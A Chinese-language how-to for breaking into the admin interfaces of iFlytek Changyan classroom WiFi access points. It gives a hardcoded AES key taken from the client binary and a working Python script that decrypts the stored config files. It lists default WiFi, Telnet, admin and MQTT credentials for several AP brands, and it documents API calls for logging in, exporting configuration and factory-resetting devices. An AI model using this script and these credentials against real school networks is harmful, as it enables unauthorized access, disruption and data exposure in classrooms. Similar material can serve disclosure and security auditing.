破解畅言AP后台密码

一、加密方案分析#

1.1 文件位置#

文件	路径	用途
ApAuthConfig.dat	`config\ApAuthConfig.dat`	AP 设备 Telnet 登录凭据（主配置）
apAuthConfigEx.dat	`data\apAuthConfigEx.dat`	AP 设备 Telnet 登录凭据（扩展）
apWlanData.dat	`data\apWlanData.dat`	WiFi 无线网络运行配置

1.2 加密参数#

参数	值
算法	AES-128-CBC
Key	`CSB-Enginer-PKey`（16 字节）
IV	与 Key 相同（`CSB-Enginer-PKey`）
外层编码	Base64
填充	PKCS7

Key 来源：从 CSB_ApService.exe 二进制文件中提取，硬编码在字符串常量中。

二、破解步骤#

2.1 环境准备#

需要 Python 3.x 和 pycryptodome 库：

1
pip install pycryptodome

2.2 解密脚本#

1
import base64
2
import json
3
from Crypto.Cipher import AES
4

5
AES_KEY = b"CSB-Enginer-PKey"  # 16-byte AES-128 key
6

7

8
def decrypt_csb_file(filepath: str) -> str:
9
    """解密 CSB_Client 的加密 .dat 配置文件"""
10
    # 1. 读取 Base64 编码内容
11
    with open(filepath, "rb") as f:
12
        b64_data = f.read()
13

14
    # 2. Base64 解码
15
    raw = base64.b64decode(b64_data)
16

17
    # 3. AES-128-CBC 解密（Key 与 IV 相同）
18
    cipher = AES.new(AES_KEY, AES.MODE_CBC, iv=AES_KEY)
19
    decrypted = cipher.decrypt(raw)
20

21
    # 4. 去除 PKCS7 填充
22
    pad_len = decrypted[-1]
23
    if 1 <= pad_len <= 16:
24
        decrypted = decrypted[:-pad_len]
25

26
    # 5. 转为 UTF-8 文本，跳过开头的对齐填充字节
27
    text = decrypted.decode("utf-8", errors="replace")
28
    # 找到第一个 '{' 作为 JSON 起点
29
    json_start = text.find("{")
30
    if json_start >= 0:
31
        text = text[json_start:]
32

33
    return text

2.3 解密 WiFi 运行配置（apWlanData.dat）#

1
def decrypt_wlan_config(data_dir: str = r"c:\Program Files (x86)\CSB_Client\data"):
2
    filepath = f"{data_dir}\\apWlanData.dat"
3
    text = decrypt_csb_file(filepath)
4

5
    # JSON 结构：
6
    # {
7
    #   "student": {"password": "xxx", "ssid": "ChangyanSTU{教室号}"},
8
    #   "teacher": {"password": "xxx", "ssid": "ChangyanTCH{教室号}"},
9
    #   "mopen":   {"password": "xxx", "ssid": "xxx"}
10
    # }
11
    data = json.loads(text)
12

13
    for role, info in data.items():
14
        ssid = info.get("ssid", "N/A")
15
        pwd = info.get("password", "N/A")
16
        print(f"  [{role}] SSID: {ssid}, 密码: {pwd}")
17

18
    return data
19

20

21
if __name__ == "__main__":
22
    print("=== WiFi 运行配置 ===")
23
    decrypt_wlan_config()

输出示例：

1
=== WiFi 运行配置 ===
2
  [student] SSID: ChangyanSTUC602, 密码: zhktzhkt
3
  [teacher] SSID: ChangyanTCHC602, 密码: iFlytek1234

2.4 解密 AP Telnet 登录凭据（ApAuthConfig.dat）#

1
def decrypt_ap_auth(config_dir: str = r"c:\Program Files (x86)\CSB_Client\config"):
2
    filepath = f"{config_dir}\\ApAuthConfig.dat"
3
    text = decrypt_csb_file(filepath)
4
    print(text)
5
    return text
6

7

8
if __name__ == "__main__":
9
    print("=== AP 登录凭据 ===")
10
    decrypt_ap_auth()

输出示例（格式化后）：

1
--- 锐捷 (CommSky) ---
2
  admin / iflytek
3
  admin / adminiwjB82rX
4
  iflytekAP / iwjB82rX
5

6
--- H3C ---
7
  admin / iflytek
8
  admin / h3capadmin
9
  iflytekAP / iwjB82rX
10

11
--- 华为 (HW) ---
12
  admin / adminiwjB82rX
13
  admin / [email protected]
14
  iflytekAP / iwjB82rX
15

16
--- 飞鱼星 (Volans) ---
17
  admin / adminiwjB82rX
18
  iflytekAP / iwjB82rX
19

20
--- H3C W6 ---
21
  admin / adminiwjB82rX

三、密码汇总表#

3.1 WiFi 网络密码#

角色	SSID 命名规则	默认密码
学生 WiFi	`ChangyanSTU` + 教室号	`zhktzhkt`
教师 WiFi	`ChangyanTCH` + 教室号	`iFlytek1234`

3.2 AP 设备 Telnet 登录密码#

AP 品牌	用户名	密码	备注
锐捷 (Ruijie)	`admin`	`iflytek`	默认首选
锐捷 (Ruijie)	`admin`	`adminiwjB82rX`	次选
锐捷 (Ruijie)	`iflytekAP`	`iwjB82rX`	讯飞专用账号
H3C	`admin`	`iflytek`	默认首选
H3C	`admin`	`h3capadmin`	次选
H3C	`iflytekAP`	`iwjB82rX`	讯飞专用账号
H3C W6	`admin`	`adminiwjB82rX`	唯一账号
华为 (HW)	`admin`	`adminiwjB82rX`	默认首选
华为 (HW)	`admin`	`[email protected]`	次选
华为 (HW)	`iflytekAP`	`iwjB82rX`	讯飞专用账号
飞鱼星 (Volans)	`admin`	`adminiwjB82rX`	默认首选
飞鱼星 (Volans)	`iflytekAP`	`iwjB82rX`	讯飞专用账号

3.3 MQTT 内部通信凭据#

用途	值
用户名	`csb_mq_user`
密码	`csb_iflytek`
服务端口	`127.0.0.1:20002`

四、AP 管理接口#

4.1 AP 管理 IP#

默认管理地址：192.168.40.1
网段：192.168.40.0/24
DHCP 范围：192.168.40.10 ~ 192.168.40.200
管理方式：HTTP RESTful API（非传统 Web 页面）

4.2 API 端点#

1
http://192.168.40.1/api/login?username=admin&password=iflytek

登录成功后返回 uid（会话令牌），后续请求需携带：

功能	方法
获取设备信息	`GET /api/devinfo?uid=xxx`
获取 WiFi 信息	`GET /api/wireless?uid=xxx&method=get`
获取连接设备	`GET /api/wireless?uid=xxx&method=sta`
获取 WAN 信息	`GET /api/wan?uid=xxx&method=wanget`
获取 DNS 信息	`GET /api/dns?uid=xxx&method=dnsget`
获取 MAC 过滤	`GET /api/wireless?uid=xxx&method=wlmfget`
导出配置	`GET /api/export?uid=xxx&method=config`
重启设备	`GET /api/rst?uid=xxx&method=restart`
恢复出厂	`GET /api/rst?uid=xxx&method=restore`

五、技术细节#

5.1 密钥发现过程#

用十六进制编辑器 / grep 搜索 CSB_ApService.exe 二进制文件
发现字符串常量：1234567890123456、CSB-Enginer-PKey、apWlanData.dat、student/teacher/mopen、ssid/password
其中 CSB-Enginer-PKey 正好 16 字节，符合 AES-128 密钥长度
用 pycryptodome 尝试 AES-128-CBC 模式，Key 和 IV 均为 CSB-Enginer-PKey，解密成功

5.2 数据流#

1
[后端服务器]
2
    |
3
    | HTTPS (cygjapi.changyan.com / jkintranet.changyan.com)
4
    v
5
[CSB_ApService.exe]
6
    |
7
    | AES-128-CBC 加密 → Base64 编码 → 写入 .dat 文件
8
    v
9
[ApAuthConfig.dat / apWlanData.dat / apAuthConfigEx.dat]
10
    |
11
    | Telnet (H3C Comware 命令行) 或 HTTP API
12
    v
13
[AP 设备 192.168.40.1]

5.3 支持的 AP 型号#

品牌标识	品牌	Telnet 登录方式
CommSky	锐捷 (Ruijie)	`login:` / `Password`
H3C	新华三	`Username:` / `Password`
H3CW6	新华三 W6 系列	`login:` / `Password`
HW	华为	`Username:` / `Password`
FYX/Volans	飞鱼星	自动检测